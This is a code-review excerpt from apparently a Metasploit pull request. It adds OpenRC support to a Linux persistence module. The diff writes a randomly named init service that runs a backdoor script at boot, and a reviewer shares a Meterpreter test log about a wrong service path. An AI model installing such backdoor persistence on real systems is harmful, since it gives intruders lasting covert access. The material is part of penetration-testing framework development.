modules/exploits/linux/local/service_persistence.rb

```diff
@@ -397,4 +408,34 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
       cmd_exec("/etc/init.d/#{service_filename} start")
     end
   end
+
+  def openrc(backdoor_path, backdoor_file)
+    # https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
+    # https://wiki.alpinelinux.org/wiki/OpenRC
+    # https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
+    script = %{#!/sbin/openrc-run
+name=#{backdoor_file}
+command=/bin/sh
+command_args="#{backdoor_path}/#{backdoor_file}"
+pidfile="/run/${RC_SVCNAME}.pid"
+command_background="yes"
+}
+
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+    service_name = "/etc/init/#{service_filename}"
```

Comment:
Should we make the service file path user configurable like the backdoor_path? 
When testing on `alpine-standard-3.20.3-x86_64.iso` I was running into the following issue:
```
[*] Writing service: /etc/init/wzDEIJe
[*] Writing '/etc/init/wzDEIJe' (140 bytes) ...
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_chmod: Operation failed: 1
```
because `/etc/init/` didn't exist on the system - it needed to be changed to`/etc/init.d/`
```suggestion
    service_name = "#{datastore['service_filepath']}/#{service_filename}"
```
If we do make the service_filepath user configurable would it also be good to rescue `Rex::Post::Meterpreter::RequestError` from `upload_and_chmodx` so we could print out a super clear error message that says something like `Writing "/etc/init/vSxoifJ" to the target and or changing the file permissions failed, ensure that directory exists`?

If you think we should just hardcode the path to `/etc/init.d` please feel free to disregard this.

Reply:
Let's hardcode it for now :)